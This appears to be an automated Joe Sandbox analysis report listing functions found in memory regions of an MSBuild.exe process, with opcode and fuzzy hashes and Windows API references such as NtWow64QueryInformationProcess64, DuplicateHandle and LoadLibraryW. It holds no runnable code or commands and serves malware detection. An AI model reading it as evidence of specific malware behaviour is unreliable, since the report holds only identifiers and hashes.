                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: Memory64ReadVirtualWow64
                              • String ID:
                              • API String ID: 3357887247-0
                              • Opcode ID: 4ab8ea5ac218b71a5e5a8bf8eef2512aeaa442d38549b870732d1353ae4e0ba2
                              • Instruction ID: fc5b71bfefaa5ddb1a7da141e975786815e3f9db5cb720c9500690cb79f5c7e1
                              • Opcode Fuzzy Hash: 4ab8ea5ac218b71a5e5a8bf8eef2512aeaa442d38549b870732d1353ae4e0ba2
                              • Instruction Fuzzy Hash: DB4168B9D042589FDF10CFA9D984A9EFBB1FB49310F24902AE918BB310D375A945CF64
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 61f83170ea813a3e7f13872f7191e535b2801ae639d8d0bebb93c051b4eea031
                              • Instruction ID: d394f6441ec57840394b048bad789b8981b7e24ff5330d7c798c81183122284e
                              • Opcode Fuzzy Hash: 61f83170ea813a3e7f13872f7191e535b2801ae639d8d0bebb93c051b4eea031
                              • Instruction Fuzzy Hash: 8941B074E01218DFDB18DFA9D484A9EBBF2BF8A300F24912AD815BB364DB346841CF54
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0261CE54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 2523a7c2a5ff478209d001039abca6a7efcca5e5f53a95c2c5df2367e582db7d
                              • Instruction ID: 3e382f59793a50239fcbde9abadc6d2fb97424fb6c9db5687b48c341429bffc1
                              • Opcode Fuzzy Hash: 2523a7c2a5ff478209d001039abca6a7efcca5e5f53a95c2c5df2367e582db7d
                              • Instruction Fuzzy Hash: 584167B9D052589FCF00CFA9D984A9EFBF1BB09310F14906AE918B7310D375A945CF69
                              APIs
                              • NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 0261CE54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 9b1ac4e0d13aea1a6637fe6f37777951a4fe26295004f6e1ecb7c68ad1950860
                              • Instruction ID: 0f4d2952e5ff3c7b336567dadc5c9f0f9bf0c6b3b03b189b6be85317d3c24280
                              • Opcode Fuzzy Hash: 9b1ac4e0d13aea1a6637fe6f37777951a4fe26295004f6e1ecb7c68ad1950860
                              • Instruction Fuzzy Hash: 4D4156B9D012589FCB00CFA9D984ADEFBB1BB09310F14906AE818B7310D375A945CF65
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4
                              • API String ID: 0-4088798008
                              • Opcode ID: dac8855d4cf3a1dbb3683b23327dc167f98d53553392cd6a0d6b6fbcbe4f4752
                              • Instruction ID: 4115ea2c4720aefb8f4040305093046889d697db7edb0010c3799b4c05028372
                              • Opcode Fuzzy Hash: dac8855d4cf3a1dbb3683b23327dc167f98d53553392cd6a0d6b6fbcbe4f4752
                              • Instruction Fuzzy Hash: 51B1DFB5E01258DFDB14CFA9D880AEEBBB2FF88301F24916AD415AB294D774A941CF50
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: K'
                              • API String ID: 0-1387706169
                              • Opcode ID: 0598866f6ff7c4e3aa58be3cb5b613d70d58770e81b4adc70446c0304d92bcf1
                              • Instruction ID: c5367f6cf53cd4d840215826b6bdaa71a8f22249822d4fcb659d73b61d96ffe9
                              • Opcode Fuzzy Hash: 0598866f6ff7c4e3aa58be3cb5b613d70d58770e81b4adc70446c0304d92bcf1
                              • Instruction Fuzzy Hash: BEB1D274E00218CFDB14DFA9D880AADBBF2FF89304F5485A9D409AB355DB35A982CF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 655414bd864fefe33e196b293f708dbf0d853e19841fead23cfb17f998873fd2
                              • Instruction ID: bb592df9f1f5ec97c36a917882f1e0b962bc89ff466fca88c0a415a95d67f16c
                              • Opcode Fuzzy Hash: 655414bd864fefe33e196b293f708dbf0d853e19841fead23cfb17f998873fd2
                              • Instruction Fuzzy Hash: 77B29C74A012298FDB64DF68C984BEDFBB2BF48311F1492D9D448A7256D730AE81CF94
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4420e5ba7cea1da23d52e096b960975cecc6e53d1fda186696cc6f2d02b78134
                              • Instruction ID: bffba03e6cb3af1d6d0ae082f9c30dd4d99606c4e39db180ab7c963828ae877b
                              • Opcode Fuzzy Hash: 4420e5ba7cea1da23d52e096b960975cecc6e53d1fda186696cc6f2d02b78134
                              • Instruction Fuzzy Hash: 81829E75784255CFDB64CF24D888B697BF5BF88308F1080A8D40A9B799DB34E984DFA0
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ac8da98994e3540cb9665f06c4e227587c45f9b52033efb12b65dcffd8337be
                              • Instruction ID: 00e648167a7603d4850376279cb2e08220b550bd588d7d03081b390f5a384b89
                              • Opcode Fuzzy Hash: 7ac8da98994e3540cb9665f06c4e227587c45f9b52033efb12b65dcffd8337be
                              • Instruction Fuzzy Hash: C2724770E00229CFDB28DF65C8547ADFBB2BF89304F1495A9D40ABB251DB74AA85CF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InformationProcess64QueryWow64
                              • String ID:
                              • API String ID: 1933981353-0
                              • Opcode ID: 5baab172941b216e0410bdc8c3610ef0e86a0f19c58e1ce907b71f308a36e1af
                              • Instruction ID: 5ace11e8aa9b1a9f960a1795be7153a997551a1c722b40485494a3cf89925221
                              • Opcode Fuzzy Hash: 5baab172941b216e0410bdc8c3610ef0e86a0f19c58e1ce907b71f308a36e1af
                              • Instruction Fuzzy Hash: 5572CD759012289FDB66CF65CD44BEDBBB6BF89300F0481EAD509A7261DB31AE81DF40
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5d569c959312ebebb9bc4512a91da6f6da6faa854e569cf8d528225be11f311
                              • Instruction ID: b0eaf501a9b9736455598f26299b68d475ab067bec89eb18fd5964bf7cb8838a
                              • Opcode Fuzzy Hash: d5d569c959312ebebb9bc4512a91da6f6da6faa854e569cf8d528225be11f311
                              • Instruction Fuzzy Hash: 0172AF74D05229CFDB64DF29C984BEDBBB2BB89300F1091E9D409AB251DB35AE85CF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30670615a6a868fb1f66723c1ce6423319f6bb43a7d70fa0a676a48ac8891e13
                              • Instruction ID: 56163c3f43daa644f68d21645f4c81b1e4b2af9b2b94ecf3d0fd403ebda72558
                              • Opcode Fuzzy Hash: 30670615a6a868fb1f66723c1ce6423319f6bb43a7d70fa0a676a48ac8891e13
                              • Instruction Fuzzy Hash: 186292B4E052198FDB24DF69C984BEDFBB2FF48304F2481A9D409A7255DB31AA81CF54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e1916c4274d111e46ef1adacee2f064cc989877b45d98e989fc0ac01600a665
                              • Instruction ID: f8aff0cfdce0789b100b949ce1e18d15b87c53432a362585e4c8c0cd6fbbf5ee
                              • Opcode Fuzzy Hash: 8e1916c4274d111e46ef1adacee2f064cc989877b45d98e989fc0ac01600a665
                              • Instruction Fuzzy Hash: 1B323A34B002058FDB15DF69C589A6EBBF6FF88300F1584AAE506AB3A1DB71ED41CB50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8dc3321535e5c454c07a2ab7c95bf5aa624f37f0ce77acb7040b8dc2a93db6d
                              • Instruction ID: e7cd62e509d14c5f0743c9be68c40cf6fc6ab8feb1cfd8354a8cdb27b9518d86
                              • Opcode Fuzzy Hash: b8dc3321535e5c454c07a2ab7c95bf5aa624f37f0ce77acb7040b8dc2a93db6d
                              • Instruction Fuzzy Hash: 2942BD74D06228CFDB69DF65C854BEDBBB2BB49300F1481EAD449A7250DB31AE85CF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a6b574fe8169b4e2706873d1d0aa80dd81cdda89685af2a01ce99dc86053d0ab
                              • Instruction ID: d663c256dd0fa13dc913683ee98f3a9a8c38e21eb8ee1c6a05b028d55c0deda0
                              • Opcode Fuzzy Hash: a6b574fe8169b4e2706873d1d0aa80dd81cdda89685af2a01ce99dc86053d0ab
                              • Instruction Fuzzy Hash: 1742C0B4E01228CFDB29CFA5D984BDDBBB2BF48304F1081AAD409A7254D735AA81DF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 89e4da68e21d7d42f34f29e6c5d87d101738ed04b33724099f0984d476579fa2
                              • Instruction ID: 25b6e036c6f7e1061b0a146f8313f691e6a82b3bb7f584b42f88f2bed53b6f4f
                              • Opcode Fuzzy Hash: 89e4da68e21d7d42f34f29e6c5d87d101738ed04b33724099f0984d476579fa2
                              • Instruction Fuzzy Hash: AE32D075D41228CFDB28DF69C944BEDBBB2BB89301F1094E9C509A7250DB34AE85DF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false

                              Control-flow Graph (graph image not reproduced; first block: 5b881e8-5b881f1)
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: C%$[#$k$
                              • API String ID: 0-2478663196

                              Control-flow Graph (graph image not reproduced; first block: 4e64c20-4e64c3a)
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0

                              Control-flow Graph (graph image not reproduced; first block: 4e6c7c8-4e6c7ea)
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0

                              Control-flow Graph (graph image not reproduced; first block: 4e6c3d0-4e6c3ea)
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0

                              Control-flow Graph (graph image not reproduced; first block: 261cb78-261cc60)
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,00000000,?,?,00000000,?), ref: 0261CC50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0

                              Control-flow Graph (graph image not reproduced; first block: 261a568-261cc60)
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,00000000,?,?,00000000,?), ref: 0261CC50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0

                              Control-flow Graph (graph image not reproduced; first block: 261d228-261d230)
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              APIs
                              • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 04E6049F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              APIs
                              • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 04E6049F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              APIs
                              • LoadLibraryW.KERNELBASE(?), ref: 04E6FDC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              • LoadLibraryW.KERNELBASE(?), ref: 04E6FDC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              APIs
                              • KiUserExceptionDispatcher.NTDLL ref: 0261CF8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DispatcherExceptionUser
                              • String ID:
                              • API String ID: 6842923-0
                              APIs
                              • KiUserExceptionDispatcher.NTDLL ref: 0261CF8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DispatcherExceptionUser
                              • String ID:
                              • API String ID: 6842923-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: d
                              • API String ID: 0-2564639436
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: U
                              • API String ID: 0-3372436214
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode Fuzzy Hash: d019a4bd423ccf69a2d9ca22b31936bc87116439dcc7ed3cc573ccc0b8062eba
                              • Instruction Fuzzy Hash: 4A71F774E002099FDB15DFA9C484A9DBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 63ddc0a365c692186f025f4f49ac5c08f315e4f627a373b10a7734d146e9ee06
                              • Instruction ID: 2f785001d72728573cf30a2413f003ecf3b651ddc1688392ad9c9c81c21119a9
                              • Opcode Fuzzy Hash: 63ddc0a365c692186f025f4f49ac5c08f315e4f627a373b10a7734d146e9ee06
                              • Instruction Fuzzy Hash: 8171F774E002099FDB15DFA9C484A9EBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4629630e44e2e1d5b0eea2a16e99f5d743dc539c6c52c68dd371ea4a275a1433
                              • Instruction ID: 1066b65db686d1ba680c64bf9aa7cd273f83be5944ef7887817c4b26c786d56f
                              • Opcode Fuzzy Hash: 4629630e44e2e1d5b0eea2a16e99f5d743dc539c6c52c68dd371ea4a275a1433
                              • Instruction Fuzzy Hash: 7271AF74D002099FCB14DFA9D894ADDFBB2FF89300F24826AE409AB351EB31A945CF54
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 589014acae2464c65c2293f6d1cdb96edf75774276b961b92e6513d7b04a3c6d
                              • Instruction ID: 816fb5d1cc938a9672bf0a0e335c03d8dc6e8821985be0a99ac95019a449419a
                              • Opcode Fuzzy Hash: 589014acae2464c65c2293f6d1cdb96edf75774276b961b92e6513d7b04a3c6d
                              • Instruction Fuzzy Hash: 7A51A571A04219DFDB14EFA5D841ABEB7B2FF88311F1495A9D805A7340DB70FA41CB90
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b582814d239316736969ef66657e8349cf1eb3515e8a33cb647039cc87ac3b4
                              • Instruction ID: 0203020fda940472c6c8d73cc4112341d9d2425db8da0de963da34641d8184d2
                              • Opcode Fuzzy Hash: 2b582814d239316736969ef66657e8349cf1eb3515e8a33cb647039cc87ac3b4
                              • Instruction Fuzzy Hash: 7951E032B083049FD715EFB8D454B2EBBA6EF89210F5445AEE446CB351CB74AC46C7A2
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90e437665557935336b072bd9bb57dbb0041ab6a3d9371af10deed1c7860f11d
                              • Instruction ID: 8545481a9fedcaeb781a00f2ddb142a029899a5097214f8cab9a1bfe36cf99d0
                              • Opcode Fuzzy Hash: 90e437665557935336b072bd9bb57dbb0041ab6a3d9371af10deed1c7860f11d
                              • Instruction Fuzzy Hash: E051D235B053019FCB14DF64C845A79BBB2FF89210B1585FAD449DB262DB38EC09CBA1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7596c95d166ef7c5df387374f5d63623718fa0a602605fc7342b0f45eb06fe9b
                              • Instruction ID: 6f26e7415348c627812936cb14311604d8370166e348f1ba1fbe8ea2a69dce89
                              • Opcode Fuzzy Hash: 7596c95d166ef7c5df387374f5d63623718fa0a602605fc7342b0f45eb06fe9b
                              • Instruction Fuzzy Hash: E661C474E112199FDB04DFA8D884BEEBBB2FF49300F108069E415AB394DB74A945CFA4
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 60c1bea4ba4da9799bd2d7ea87179511ff8e8207a1230e75868eafa8f6c8c913
                              • Instruction ID: b6f79bab929c01b21b6653ed23fbd5573a708cfedf14719cf80abdc30b52a5e3
                              • Opcode Fuzzy Hash: 60c1bea4ba4da9799bd2d7ea87179511ff8e8207a1230e75868eafa8f6c8c913
                              • Instruction Fuzzy Hash: C751EDB4D0520ACFDF04EFA9C884AEEBBB2BF49304F10956AD815AB354E7746946CF50
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5498550f81aa8a0b3f1158748b673a951bf052076ca492c0696cead79d403cde
                              • Instruction ID: 1bab7612ba75d47f4901b5f011dc3a54885f173f809015606d9fad84ab30c9d6
                              • Opcode Fuzzy Hash: 5498550f81aa8a0b3f1158748b673a951bf052076ca492c0696cead79d403cde
                              • Instruction Fuzzy Hash: 0541C136B142019FCB18EA78D95667E7BE6EFC825071005B9D84AE7291EF38FC05C7A1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a422e86763fe136c14bc148b3e96cb5177605dd0224149d0e40fe354e1e73bfc
                              • Instruction ID: 2f06daf447962668e7894cd71874168175734b624018be2c50aae1d4bd168b96
                              • Opcode Fuzzy Hash: a422e86763fe136c14bc148b3e96cb5177605dd0224149d0e40fe354e1e73bfc
                              • Instruction Fuzzy Hash: EC519F31A003059FCB11DF58D981AAEBBB2FF88314F18C969D4199B255DB71FD068BA2
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 40357db353c13391688f68148bc8e82db1302c20466c1b3c77ae6607136c3754
                              • Instruction ID: 9bd390c9b6b49db7b6eb1bb8bb00ed2048d57af0c413fad703961b7ec52c759c
                              • Opcode Fuzzy Hash: 40357db353c13391688f68148bc8e82db1302c20466c1b3c77ae6607136c3754
